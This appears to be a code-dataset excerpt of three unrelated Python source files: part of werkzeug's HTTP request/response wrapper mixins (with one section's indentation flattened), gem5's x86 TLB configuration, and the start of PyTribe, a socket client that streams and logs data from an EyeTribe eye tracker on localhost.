    parsed user agent of the browser that triggered the request as a
    :class:`~werkzeug.useragents.UserAgent` object.
    """
    @cached_property
    def user_agent(self):
        """The current user agent."""
        # imported lazily to keep the wrappers module import light
        from werkzeug.useragents import UserAgent as agent_cls
        return agent_cls(self.environ)
class AuthorizationMixin(object):
    """Adds an :attr:`authorization` property that represents the parsed
    value of the `Authorization` header as
    :class:`~werkzeug.datastructures.Authorization` object.
    """
    @cached_property
    def authorization(self):
        """The `Authorization` object in parsed form."""
        raw = self.environ.get('HTTP_AUTHORIZATION')
        return parse_authorization_header(raw)
class ETagResponseMixin(object):
"""Adds extra functionality to a response object for etag and cache
handling. This mixin requires an object with at least a `headers`
object that implements a dict like interface similar to
:class:`~werkzeug.datastructures.Headers`.
If you want the :meth:`freeze` method to automatically add an etag, you
have to mixin this method before the response base class. The default
response class does not do that.
"""
@property
def cache_control(self):
"""The Cache-Control general-header field is used to specify
directives that MUST be obeyed by all caching mechanisms along the
request/response chain.
"""
def on_update(cache_control):
if not cache_control and 'cache-control' in self.headers:
del self.headers['cache-control']
elif cache_control:
self.headers['Cache-Control'] = cache_control.to_header()
return parse_cache_control_header(self.headers.get('cache-control'),
on_update,
ResponseCacheControl)
def make_conditional(self, request_or_environ):
"""Make the response conditional to the request. This method works
best if an etag was defined for the response already. The `add_etag`
method can be used to do that. If called without etag just the date
header is set.
This does nothing if the request method in the request or environ is
anything but GET or HEAD.
It does not remove the body of the response because that's something
the :meth:`__call__` function does for us automatically.
Returns self so that you can do ``return resp.make_conditional(req)``
but modifies the object in-place.
:param request_or_environ: a request object or WSGI environment to be
used to make the response conditional
against.
"""
environ = _get_environ(request_or_environ)
if environ['REQUEST_METHOD'] in ('GET', 'HEAD'):
# if the date is not in the headers, add it now. We however
# will not override an already existing header. Unfortunately
# this header will be overriden by many WSGI servers including
# wsgiref.
if 'date' not in self.headers:
self.headers['Date'] = http_date()
if 'content-length' not in self.headers:
self.headers['Content-Length'] = len(self.data)
if not is_resource_modified(environ, self.headers.get('etag'), None,
self.headers.get('last-modified')):
self.status_code = 304
return self
def add_etag(self, overwrite=False, weak=False):
"""Add an etag for the current response if there is none yet."""
if overwrite or 'etag' not in self.headers:
self.set_etag(generate_etag(self.data), weak)
    def set_etag(self, etag, weak=False):
        """Set the etag, and override the old one if there was one.

        :param etag: the etag value as string.
        :param weak: set to `True` to mark the etag as weak.
        """
        self.headers['ETag'] = quote_etag(etag, weak)
    def get_etag(self):
        """Return a tuple in the form ``(etag, is_weak)``.  If there is no
        ETag the return value is ``(None, None)``.
        """
        # unquote_etag performs the parsing of quoted / W/-prefixed values
        return unquote_etag(self.headers.get('ETag'))
    def freeze(self, no_etag=False):
        """Call this method if you want to make your response object ready for
        pickling.  This buffers the generator if there is one.  This also
        sets the etag unless `no_etag` is set to `True`.

        :param no_etag: skip adding an etag before freezing.
        """
        if not no_etag:
            self.add_etag()
        # the base class takes care of buffering the response iterable
        super(ETagResponseMixin, self).freeze()
accept_ranges = header_property('Accept-Ranges', doc='''
The `Accept-Ranges` header. Even though the name would indicate
that multiple values are supported, it must be one string token only.
The values ``'bytes'`` and ``'none'`` are common.
.. versionadded:: 0.7''')
    def _get_content_range(self):
        # getter for the ``content_range`` property defined below
        def on_update(rng):
            # write mutations of the parsed object back into the header
            if not rng:
                del self.headers['content-range']
            else:
                self.headers['Content-Range'] = rng.to_header()
        rv = parse_content_range_header(self.headers.get('content-range'),
                                        on_update)
        # always provide a content range object to make the descriptor
        # more user friendly.  It provides an unset() method that can be
        # used to remove the header quickly.
        if rv is None:
            rv = ContentRange(None, None, None, on_update=on_update)
        return rv
    def _set_content_range(self, value):
        # setter for the ``content_range`` property defined below; accepts
        # a falsy value (removes the header), a plain string (stored
        # verbatim), or a ContentRange-like object with ``to_header()``
        if not value:
            del self.headers['content-range']
        elif isinstance(value, basestring):
            self.headers['Content-Range'] = value
        else:
            self.headers['Content-Range'] = value.to_header()
content_range = property(_get_content_range, _set_content_range, doc='''
The `Content-Range` header as
:class:`~werkzeug.datastructures.ContentRange` object. Even if the
header is not set it wil provide such an object for easier
manipulation.
.. versionadded:: 0.7''')
del _get_content_range, _set_content_range
class ResponseStream(object):
    """Write-only file-like object used by the :class:`ResponseStreamMixin`.

    Everything written is appended directly to the response iterable of
    the wrapped response object.
    """

    # advertised file mode of the stream
    mode = 'wb+'

    def __init__(self, response):
        # the response object whose iterable receives the writes
        self.response = response
        # becomes True once close() has been called
        self.closed = False

    def _fail_if_closed(self):
        # all file operations on a closed stream raise the same error a
        # real file object would
        if self.closed:
            raise ValueError('I/O operation on closed file')

    def write(self, value):
        """Append *value* to the response iterable."""
        self._fail_if_closed()
        self.response._ensure_sequence(mutable=True)
        self.response.response.append(value)

    def writelines(self, seq):
        """Write every item of the iterable *seq* to the stream."""
        for chunk in seq:
            self.write(chunk)

    def close(self):
        """Mark the stream as closed; later operations raise ValueError."""
        self.closed = True

    def flush(self):
        """No-op apart from the closed-file check (nothing is buffered)."""
        self._fail_if_closed()

    def isatty(self):
        """A response stream is never attached to a terminal."""
        self._fail_if_closed()
        return False

    @property
    def encoding(self):
        # the character set is dictated by the wrapped response object
        return self.response.charset
class ResponseStreamMixin(object):
    """Mixin for :class:`BaseResponse` subclasses.  Classes that inherit from
    this mixin will automatically get a :attr:`stream` property that provides
    a write-only interface to the response iterable.
    """

    @cached_property
    def stream(self):
        """The response iterable as write-only stream."""
        # cached so every access returns the same ResponseStream instance
        return ResponseStream(self)
class CommonRequestDescriptorsMixin(object):
    """A mixin for :class:`BaseRequest` subclasses.  Request objects that
    mix this class in will automatically get descriptors for a couple of
    HTTP headers with automatic type conversion.

    .. versionadded:: 0.5
    """

    content_type = environ_property('CONTENT_TYPE', doc='''
The Content-Type entity-header field indicates the media type of
the entity-body sent to the recipient or, in the case of the HEAD
method, the media type that would have been sent had the request
been a GET.''')
    content_length = environ_property('CONTENT_LENGTH', None, int, str, doc='''
The Content-Length entity-header field indicates the size of the
entity-body in bytes or, in the case of the HEAD method, the size of
the entity-body that would have been sent had the request been a
GET.''')
    referrer = environ_property('HTTP_REFERER', doc='''
The Referer[sic] request-header field allows the client to specify,
for the server's benefit, the address (URI) of the resource from which
the Request-URI was obtained (the "referrer", although the header
field is misspelled).''')
    date = environ_property('HTTP_DATE', None, parse_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
    max_forwards = environ_property('HTTP_MAX_FORWARDS', None, int, doc='''
The Max-Forwards request-header field provides a mechanism with the
TRACE and OPTIONS methods to limit the number of proxies or gateways
that can forward the request to the next inbound server.''')

    def _parse_content_type(self):
        # parse the Content-Type header once and cache the result on the
        # instance; shared by the mimetype and mimetype_params properties
        if not hasattr(self, '_parsed_content_type'):
            self._parsed_content_type = \
                parse_options_header(self.environ.get('CONTENT_TYPE', ''))

    @property
    def mimetype(self):
        """Like :attr:`content_type` but without parameters (eg, without
        charset, type etc.).  For example if the content
        type is ``text/html; charset=utf-8`` the mimetype would be
        ``'text/html'``.
        """
        self._parse_content_type()
        return self._parsed_content_type[0]

    @property
    def mimetype_params(self):
        """The mimetype parameters as dict.  For example if the content
        type is ``text/html; charset=utf-8`` the params would be
        ``{'charset': 'utf-8'}``.
        """
        self._parse_content_type()
        return self._parsed_content_type[1]

    @cached_property
    def pragma(self):
        """The Pragma general-header field is used to include
        implementation-specific directives that might apply to any recipient
        along the request/response chain.  All pragma directives specify
        optional behavior from the viewpoint of the protocol; however, some
        systems MAY require that behavior be consistent with the directives.
        """
        return parse_set_header(self.environ.get('HTTP_PRAGMA', ''))
class CommonResponseDescriptorsMixin(object):
    """A mixin for :class:`BaseResponse` subclasses.  Response objects that
    mix this class in will automatically get descriptors for a couple of
    HTTP headers with automatic type conversion.
    """

    def _get_mimetype(self):
        # getter for the ``mimetype`` property: the content type without
        # its parameters (e.g. without the charset); None when unset
        ct = self.headers.get('content-type')
        if ct:
            return ct.split(';')[0].strip()

    def _set_mimetype(self, value):
        # setter for the ``mimetype`` property; re-attaches the response
        # charset where applicable
        self.headers['Content-Type'] = get_content_type(value, self.charset)

    def _get_mimetype_params(self):
        # getter for the ``mimetype_params`` property; mutations of the
        # returned dict are serialized back into the Content-Type header
        def on_update(d):
            self.headers['Content-Type'] = \
                dump_options_header(self.mimetype, d)
        d = parse_options_header(self.headers.get('content-type', ''))[1]
        return CallbackDict(d, on_update)

    mimetype = property(_get_mimetype, _set_mimetype, doc='''
The mimetype (content type without charset etc.)''')
    mimetype_params = property(_get_mimetype_params, doc='''
The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.5
''')
    location = header_property('Location', doc='''
The Location response-header field is used to redirect the recipient
to a location other than the Request-URI for completion of the request
or identification of a new resource.''')
    age = header_property('Age', None, parse_date, http_date, doc='''
The Age response-header field conveys the sender's estimate of the
amount of time since the response (or its revalidation) was
generated at the origin server.
Age values are non-negative decimal integers, representing time in
seconds.''')
    content_type = header_property('Content-Type', doc='''
The Content-Type entity-header field indicates the media type of the
entity-body sent to the recipient or, in the case of the HEAD method,
the media type that would have been sent had the request been a GET.
''')
    content_length = header_property('Content-Length', None, int, str, doc='''
The Content-Length entity-header field indicates the size of the
entity-body, in decimal number of OCTETs, sent to the recipient or,
in the case of the HEAD method, the size of the entity-body that would
have been sent had the request been a GET.''')
    content_location = header_property('Content-Location', doc='''
The Content-Location entity-header field MAY be used to supply the
resource location for the entity enclosed in the message when that
entity is accessible from a location separate from the requested
resource's URI.''')
    content_encoding = header_property('Content-Encoding', doc='''
The Content-Encoding entity-header field is used as a modifier to the
media-type. When present, its value indicates what additional content
codings have been applied to the entity-body, and thus what decoding
mechanisms must be applied in order to obtain the media-type
referenced by the Content-Type header field.''')
    content_md5 = header_property('Content-MD5', doc='''
The Content-MD5 entity-header field, as defined in RFC 1864, is an
MD5 digest of the entity-body for the purpose of providing an
end-to-end message integrity check (MIC) of the entity-body. (Note:
a MIC is good for detecting accidental modification of the
entity-body in transit, but is not proof against malicious attacks.)
''')
    date = header_property('Date', None, parse_date, http_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
    expires = header_property('Expires', None, parse_date, http_date, doc='''
The Expires entity-header field gives the date/time after which the
response is considered stale. A stale cache entry may not normally be
returned by a cache.''')
    last_modified = header_property('Last-Modified', None, parse_date,
                                    http_date, doc='''
The Last-Modified entity-header field indicates the date and time at
which the origin server believes the variant was last modified.''')

    def _get_retry_after(self):
        # getter for the ``retry_after`` property; a purely numeric header
        # value is interpreted as a delta in seconds from now, anything
        # else is parsed as an HTTP date
        value = self.headers.get('retry-after')
        if value is None:
            return
        elif value.isdigit():
            return datetime.utcnow() + timedelta(seconds=int(value))
        return parse_date(value)

    def _set_retry_after(self, value):
        # setter for the ``retry_after`` property; accepts None (removes
        # the header), a datetime (serialized as HTTP date), or anything
        # convertible to str
        if value is None:
            if 'retry-after' in self.headers:
                del self.headers['retry-after']
            return
        elif isinstance(value, datetime):
            value = http_date(value)
        else:
            value = str(value)
        self.headers['Retry-After'] = value

    retry_after = property(_get_retry_after, _set_retry_after, doc='''
The Retry-After response-header field can be used with a 503 (Service
Unavailable) response to indicate how long the service is expected
to be unavailable to the requesting client.
Time in seconds until expiration or date.''')

    def _set_property(name, doc=None):
        # descriptor factory for header-set valued headers (Vary,
        # Content-Language, Allow); called at class-definition time and
        # deleted again below, it never becomes a method
        def fget(self):
            def on_update(header_set):
                # keep the raw header in step with the parsed set object
                if not header_set and name in self.headers:
                    del self.headers[name]
                elif header_set:
                    self.headers[name] = header_set.to_header()
            return parse_set_header(self.headers.get(name), on_update)
        def fset(self, value):
            # falsy removes the header, strings are stored verbatim,
            # iterables are dumped through dump_header
            if not value:
                del self.headers[name]
            elif isinstance(value, basestring):
                self.headers[name] = value
            else:
                self.headers[name] = dump_header(value)
        return property(fget, fset, doc=doc)

    vary = _set_property('Vary', doc='''
The Vary field value indicates the set of request-header fields that
fully determines, while the response is fresh, whether a cache is
permitted to use the response to reply to a subsequent request
without revalidation.''')
    content_language = _set_property('Content-Language', doc='''
The Content-Language entity-header field describes the natural
language(s) of the intended audience for the enclosed entity. Note
that this might not be equivalent to all the languages used within
the entity-body.''')
    allow = _set_property('Allow', doc='''
The Allow entity-header field lists the set of methods supported
by the resource identified by the Request-URI. The purpose of this
field is strictly to inform the recipient of valid methods
associated with the resource. An Allow header field MUST be
present in a 405 (Method Not Allowed) response.''')

    # drop the helper functions from the class namespace now that the
    # descriptors have been created
    del _set_property, _get_mimetype, _set_mimetype, _get_retry_after, \
        _set_retry_after
class WWWAuthenticateMixin(object):
    """Mixin that equips a response object with a parsed
    :attr:`www_authenticate` property.
    """

    @property
    def www_authenticate(self):
        """The `WWW-Authenticate` header in a parsed form."""
        def _sync_header(auth):
            # keep the raw header in step with mutations of the parsed
            # object: re-serialize while it has content, drop it once it
            # is emptied
            if auth:
                self.headers['WWW-Authenticate'] = auth.to_header()
            elif 'www-authenticate' in self.headers:
                del self.headers['www-authenticate']
        return parse_www_authenticate_header(
            self.headers.get('www-authenticate'), _sync_header)
class Request(BaseRequest, AcceptMixin, ETagRequestMixin,
              UserAgentMixin, AuthorizationMixin,
              CommonRequestDescriptorsMixin):
    """Full featured request object implementing the following mixins:

    - :class:`AcceptMixin` for accept header parsing
    - :class:`ETagRequestMixin` for etag and cache control handling
    - :class:`UserAgentMixin` for user agent introspection
    - :class:`AuthorizationMixin` for http auth handling
    - :class:`CommonRequestDescriptorsMixin` for common headers
    """
class Response(BaseResponse, ETagResponseMixin, ResponseStreamMixin,
               CommonResponseDescriptorsMixin,
               WWWAuthenticateMixin):
    """Full featured response object implementing the following mixins:

    - :class:`ETagResponseMixin` for etag and cache control handling
    - :class:`ResponseStreamMixin` to add support for the `stream` property
    - :class:`CommonResponseDescriptorsMixin` for various HTTP descriptors
    - :class:`WWWAuthenticateMixin` for HTTP authentication support
    """
|
ajgallegog/gem5_arm | refs/heads/master | src/arch/x86/X86TLB.py | 61 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.params import *
from m5.proxy import *
from BaseTLB import BaseTLB
from MemObject import MemObject
class X86PagetableWalker(MemObject):
    # SimObject declaration for the x86 hardware page-table walker; the
    # C++ implementation is X86ISA::Walker in the header named below.
    type = 'X86PagetableWalker'
    cxx_class = 'X86ISA::Walker'
    cxx_header = 'arch/x86/pagetable_walker.hh'
    # memory-side port through which the walker issues its requests
    port = MasterPort("Port for the hardware table walker")
    # resolved from the enclosing system via proxy
    system = Param.System(Parent.any, "system object")
    num_squash_per_cycle = Param.Unsigned(4,
            "Number of outstanding walks that can be squashed per cycle")
class X86TLB(BaseTLB):
    # SimObject declaration for the x86 TLB, backed by X86ISA::TLB.
    type = 'X86TLB'
    cxx_class = 'X86ISA::TLB'
    cxx_header = 'arch/x86/tlb.hh'
    # number of TLB entries
    size = Param.Unsigned(64, "TLB size")
    # every TLB instantiates its own page-table walker by default
    walker = Param.X86PagetableWalker(\
        X86PagetableWalker(), "page table walker")
|
luojxxx/handsfree | refs/heads/master | PyTribe-master/pytribe.py | 2 | # PyTribe: classes to communicate with EyeTribe eye trackers
#
# author: Edwin Dalmaijer
# email: edwin.dalmaijer@psy.ox.ac.uk
#
# version 3 (11-Aug-2014)
import os
import copy
import json
import time
import socket
from threading import Thread, Lock
from multiprocessing import Queue
class EyeTribe:
    """class for eye tracking and data collection using an EyeTribe tracker

    Owns the socket connection and runs three daemon threads: a
    heartbeater that keeps the connection alive, a sample streamer that
    polls the tracker and queues frames, and a data processor that keeps
    the most recent sample up to date and logs frames while recording.
    """

    def __init__(self, logfilename='default.txt'):
        """Initializes an EyeTribe instance

        keyword arguments

        logfilename    --    string indicating the log file name, including
                    a full path to its location and an extension
                    (default = 'default.txt')
        """
        # initialize data collectors
        # NOTE(review): '.tsv' is appended to the full name passed in, so
        # the default produces a file called 'default.txt.tsv'
        self._logfile = open('%s.tsv' % (logfilename), 'w')
        self._separator = '\t'
        self._log_header()
        # NOTE(review): a multiprocessing.Queue is used although only
        # threads produce/consume it; Queue.Queue would suffice here
        self._queue = Queue()
        # initialize connection (the EyeTribe server listens on port 6555)
        self._connection = connection(host='localhost', port=6555)
        self._tracker = tracker(self._connection)
        self._heartbeat = heartbeat(self._connection)
        # create a new Lock; serializes connection access between the
        # three worker threads
        self._lock = Lock()
        # initialize heartbeat thread (the tracker reports the interval in
        # milliseconds, recalculated to seconds here)
        self._beating = True
        self._heartbeatinterval = self._tracker.get_heartbeatinterval() / 1000.0
        self._hbthread = Thread(target=self._heartbeater, args=[self._heartbeatinterval])
        self._hbthread.daemon = True
        self._hbthread.name = 'heartbeater'
        # initialize sample streamer at the tracker's own frame rate
        self._streaming = True
        self._samplefreq = self._tracker.get_framerate()
        self._intsampletime = 1.0 / self._samplefreq
        self._ssthread = Thread(target=self._stream_samples, args=[self._queue])
        self._ssthread.daemon = True
        self._ssthread.name = 'samplestreamer'
        # initialize data processer; _currentsample is seeded here so the
        # processing thread never sees it unset
        self._processing = True
        self._logdata = False
        self._currentsample = self._tracker.get_frame()
        self._dpthread = Thread(target=self._process_samples, args=[self._queue])
        self._dpthread.daemon = True
        self._dpthread.name = 'dataprocessor'
        # start all threads
        self._hbthread.start()
        self._ssthread.start()
        self._dpthread.start()
        # initialize calibration
        self.calibration = calibration(self._connection)

    def start_recording(self):
        """Starts data recording
        """
        # set self._logdata to True, so the data processing thread starts
        # writing samples to the log file
        if not self._logdata:
            self._logdata = True
            self.log_message("start_recording")

    def stop_recording(self):
        """Stops data recording
        """
        # set self._logdata to False, so the data processing thread does not
        # write samples to the log file
        if self._logdata:
            self.log_message("stop_recording")
            self._logdata = False

    def log_message(self, message):
        """Logs a message to the logfile, time locked to the most recent
        sample

        arguments

        message    --    string with the message to write to the log
        """
        # timestamp, based on the most recent sample (empty fields when no
        # sample has been seen yet)
        if self._currentsample != None:
            ts = self._currentsample['timestamp']
            t = self._currentsample['time']
        else:
            ts = ''
            t = ''
        # assemble line
        line = self._separator.join(map(str, ['MSG', ts, t, message]))
        # write message
        self._logfile.write(line + '\n')    # to internal buffer
        self._logfile.flush()               # internal buffer to RAM
        os.fsync(self._logfile.fileno())    # RAM file cache to disk

    def sample(self):
        """Returns the most recent point of regard (=gaze location on screen)
        coordinates (smoothed signal)

        arguments

        None

        returns

        gaze    --    a (x,y) tuple indicating the point of regard, or
                (None, None) when no sample is available
        """
        if self._currentsample == None:
            return None, None
        else:
            return (self._currentsample['avgx'], self._currentsample['avgy'])

    def pupil_size(self):
        """Returns the most recent pupil size sample (an average of the size
        of both pupils)

        arguments

        None

        returns

        pupsize    --    a float indicating the pupil size (in arbitrary
                units), or None when no sample is available
        """
        if self._currentsample == None:
            return None
        else:
            return self._currentsample['psize']

    def close(self):
        """Stops all data streaming, and closes both the connection to the
        tracker and the logfile
        """
        # if we are currently recording, stop doing so
        if self._logdata:
            self.stop_recording()
        # signal all threads to halt
        self._beating = False
        self._streaming = False
        self._processing = False
        # NOTE(review): the worker threads are not joined before the file
        # and socket are closed below, so a thread mid-iteration may still
        # touch them -- consider joining the threads first
        # close the log file
        self._logfile.close()
        # close the connection
        self._connection.close()

    def _wait_while_calibrating(self):
        """Waits until the tracker is not in the calibration state
        """
        # busy-wait on the tracker's calibration flag
        while self._tracker.get_iscalibrating():
            pass
        return True

    def _heartbeater(self, heartbeatinterval):
        """Continuously sends heartbeats to the tracker, to let it know the
        connection is still alive (it seems to think we could die any
        moment now, and is very keen on reassurance of our good health;
        almost like my grandparents...)

        arguments

        heartbeatinterval    --    float indicating the heartbeatinterval in
                        seconds; note that this is different from
                        the value that the EyeTribe tracker reports:
                        that value is in milliseconds and should be
                        recalculated to seconds here!
        """
        # keep beating until it is signalled that we should stop
        while self._beating:
            # do not bother the tracker when it is calibrating
            #self._wait_while_calibrating()
            # wait for the Threading Lock to be released, then lock it
            self._lock.acquire(True)
            # send heartbeat
            self._heartbeat.beat()
            # release the Threading Lock
            self._lock.release()
            # wait for a bit
            time.sleep(heartbeatinterval)

    def _stream_samples(self, queue):
        """Continuously polls the device, and puts all new samples in a
        Queue instance

        arguments

        queue    --    a multithreading.Queue instance, to put samples
                into
        """
        # keep streaming until it is signalled that we should stop
        while self._streaming:
            # do not bother the tracker when it is calibrating
            #self._wait_while_calibrating()
            # wait for the Threading Lock to be released, then lock it
            self._lock.acquire(True)
            # get a new sample
            sample = self._tracker.get_frame()
            # put the sample in the Queue
            queue.put(sample)
            # release the Threading Lock
            self._lock.release()
            # pause for half the intersample time, to avoid an overflow
            # (but to make sure to not miss any samples)
            time.sleep(self._intsampletime / 2)

    def _process_samples(self, queue):
        """Continuously processes samples, updating the most recent sample
        and writing data to a the log file when self._logdata is set to True

        arguments

        queue    --    a multithreading.Queue instance, to read samples
                from
        """
        # keep processing until it is signalled that we should stop
        while self._processing:
            # wait for the Threading Lock to be released, then lock it
            self._lock.acquire(True)
            # read new item from the queue
            if not queue.empty():
                sample = queue.get()
            else:
                sample = None
            # release the Threading Lock
            self._lock.release()
            # update newest sample
            if sample != None:
                # check if the new sample is the same as the current sample
                # NOTE(review): assumes self._currentsample is never None
                # here (it is seeded in __init__) -- confirm get_frame
                # cannot return None
                if not self._currentsample['timestamp'] == sample['timestamp']:
                    # update current sample (deep copy so later mutation of
                    # the queued dict cannot change the published sample)
                    self._currentsample = copy.deepcopy(sample)
                    # write to file if data logging is on
                    if self._logdata:
                        self._log_sample(sample)

    def _log_sample(self, sample):
        """Writes a sample to the log file

        arguments

        sample    --    a sample dict, as is returned by
                tracker.get_frame
        """
        # assemble new line (column order must match _log_header)
        line = self._separator.join(map(str, [sample['timestamp'],
                                              sample['time'],
                                              sample['fix'],
                                              sample['state'],
                                              sample['rawx'],
                                              sample['rawy'],
                                              sample['avgx'],
                                              sample['avgy'],
                                              sample['psize'],
                                              sample['Lrawx'],
                                              sample['Lrawy'],
                                              sample['Lavgx'],
                                              sample['Lavgy'],
                                              sample['Lpsize'],
                                              sample['Lpupilx'],
                                              sample['Lpupily'],
                                              sample['Rrawx'],
                                              sample['Rrawy'],
                                              sample['Ravgx'],
                                              sample['Ravgy'],
                                              sample['Rpsize'],
                                              sample['Rpupilx'],
                                              sample['Rpupily']
                                              ]))
        # write line to log file
        self._logfile.write(line + '\n')    # to internal buffer
        self._logfile.flush()               # internal buffer to RAM
        os.fsync(self._logfile.fileno())    # RAM file cache to disk

    def _log_header(self):
        """Logs a header to the data file
        """
        # write a header to the data file (column order must match
        # _log_sample)
        header = self._separator.join(['timestamp', 'time', 'fix', 'state',
                                       'rawx', 'rawy', 'avgx', 'avgy', 'psize',
                                       'Lrawx', 'Lrawy', 'Lavgx', 'Lavgy', 'Lpsize', 'Lpupilx', 'Lpupily',
                                       'Rrawx', 'Rrawy', 'Ravgx', 'Ravgy', 'Rpsize', 'Rpupilx', 'Rpupily'
                                       ])
        self._logfile.write(header + '\n')    # to internal buffer
        self._logfile.flush()                 # internal buffer to RAM
        os.fsync(self._logfile.fileno())      # RAM file cache to disk
        self._firstlog = False
# # # # #
# low-level classes
class connection:
    """class for connections with the EyeTribe tracker

    Wraps a TCP socket to the tracker server and provides JSON
    request/response round trips.
    """

    def __init__(self, host='localhost', port=6555):
        """Initializes the connection with the EyeTribe tracker

        keyword arguments

        host    --    a string indicating the host IP, NOTE: currently only
                'localhost' is supported (default = 'localhost')
        port    --    an integer indicating the port number, NOTE: currently
                only 6555 is supported (default = 6555)
        """
        # properties
        self.host = host
        self.port = port
        # responses received but not yet claimed by a request
        self.resplist = []
        # set to True to print every request and reply
        self.DEBUG = False
        # initialize a connection
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect((self.host, self.port))
        # Create lock; serializes whole send/receive round trips
        self._request_lock = Lock()

    def request(self, category, request, values):
        """Send a message over the connection

        arguments

        category    --    string indicating the query category
        request     --    string indicating the actual request of the message
        values      --    dict or list containing parameters of the request

        returns

        the parsed response dict that matches this request, or a synthetic
        statuscode-901 'connection error' dict when the socket failed
        """
        # create a JSON formatted string
        msg = self.create_json(category, request, values)
        # send the message over the connection
        self._request_lock.acquire()
        self.sock.send(msg)
        # print request in DEBUG mode
        if self.DEBUG:
            print("REQUEST: '%s'" % msg)
        # give the tracker a wee bit of time to reply
        time.sleep(0.005)
        # get new responses
        success = self.get_response()
        self._request_lock.release()
        # return the appropriate response
        if success:
            for i in range(len(self.resplist)):
                # check if the category matches
                if self.resplist[i]['category'] == category:
                    # if this is a heartbeat, return
                    if self.resplist[i]['category'] == 'heartbeat':
                        return self.resplist.pop(i)
                    # if this is another category, check if the request
                    # matches
                    elif self.resplist[i]['request'] == request:
                        return self.resplist.pop(i)
            # NOTE(review): when no queued response matches, execution
            # falls through here and None is returned implicitly --
            # callers do not check for that
        # on a connection error, get_response returns False and a connection
        # error should be returned
        else:
            return self.parse_json('{"statuscode":901,"values":{"statusmessage":"connection error"}}')

    def get_response(self):
        """Asks for a response, and adds these to the list of all received
        responses (basically a very simple queue)

        returns

        True on success; False when the socket raised an error (in which
        case the connection is revived)
        """
        # try to get a new response
        try:
            response = self.sock.recv(32768)
            # print reply in DEBUG mode
            if self.DEBUG:
                print("REPLY: '%s'" % response)
        # if it fails, revive the connection and return a connection error
        except socket.error:
            print("reviving connection")
            self.revive()
            # NOTE(review): this assignment is dead -- False is returned on
            # the next line and the string is never used
            response = '{"statuscode":901,"values":{"statusmessage":"connection error"}}'
            return False
        # split the responses (in case multiple came in)
        response = response.split('\n')
        # add parsed responses to the internal list
        for r in response:
            if r:
                self.resplist.append(self.parse_json(r))
        return True

    def create_json(self, category, request, values):
        """Creates a new json message, in the format that is required by the
        EyeTribe tracker; these messages consist of a category, a request and
        a (list of) value(s), which can be thought of as class.method.value
        (for more info, see: http://dev.theeyetribe.com/api/)

        arguments

        category    --    query category (string), e.g. 'tracker',
                    'calibration', or 'heartbeat'
        request     --    the request message (string), e.g. 'get' for the
                    'tracker' category
        values      --    a dict of parameters and their values, e.g.
                    {"push":True, "version":1}
                    OR:
                    a list of parameters, e.g. ['push','iscalibrated']
                    OR:
                    None to pass no values at all

        keyword arguments

        None

        returns

        jsonmsg     --    a string in json format, that can be directly sent to
                    the EyeTribe tracker
        """
        # check if 'values' is a dict
        if type(values) == dict:
            # create a value string
            valuestring = '''{\n'''
            # loop through all keys of the value dict
            for k in values.keys():
                # add key and value
                # NOTE(review): %s renders Python values (e.g. 'True'
                # rather than JSON 'true', unquoted strings) -- callers
                # must pre-format values that need JSON syntax
                valuestring += '\t\t"%s": %s,\n' % (k, values[k])
            # omit final comma
            valuestring = valuestring[:-2]
            valuestring += '\n\t}'
        # check if 'values' is a tuple or a list
        elif type(values) in [list, tuple]:
            # create a value string
            valuestring = '''[ "'''
            # compose a string of all the values
            valuestring += '", "'.join(values)
            # append the list ending
            valuestring += '" ]'
        # check if there are no values
        elif values == None:
            pass
        # error if the values are anything other than a dict, tuple or list
        else:
            raise Exception("values should be dict, tuple or list, not '%s' (values = %s)" % (type(values), values))
        # create the json message
        if request == None:
            jsonmsg = '''
{
"category": "%s"
}''' % (category)
        elif values == None:
            # NOTE(review): the trailing comma after the "request" line
            # makes this branch produce invalid JSON -- confirm against
            # the tracker's parser
            jsonmsg = '''
{
"category": "%s",
"request": "%s",
}''' % (category, request)
        else:
            jsonmsg = '''
{
"category": "%s",
"request": "%s",
"values": %s
}''' % (category, request, valuestring)
        return jsonmsg

    def parse_json(self, jsonmsg):
        """Parses a json message as those that are usually returned by the
        EyeTribe tracker
        (for more info, see: http://dev.theeyetribe.com/api/)

        arguments

        jsonmsg     --    a string in json format

        keyword arguments

        None

        returns

        msg         --    a dict containing the information in the json message;
                    this dict has the following content:
                    {    "category": "tracker",
                        "request": "get",
                        "statuscode": 200,
                        "values": {    "push":True,
                                "iscalibrated":True
                                }
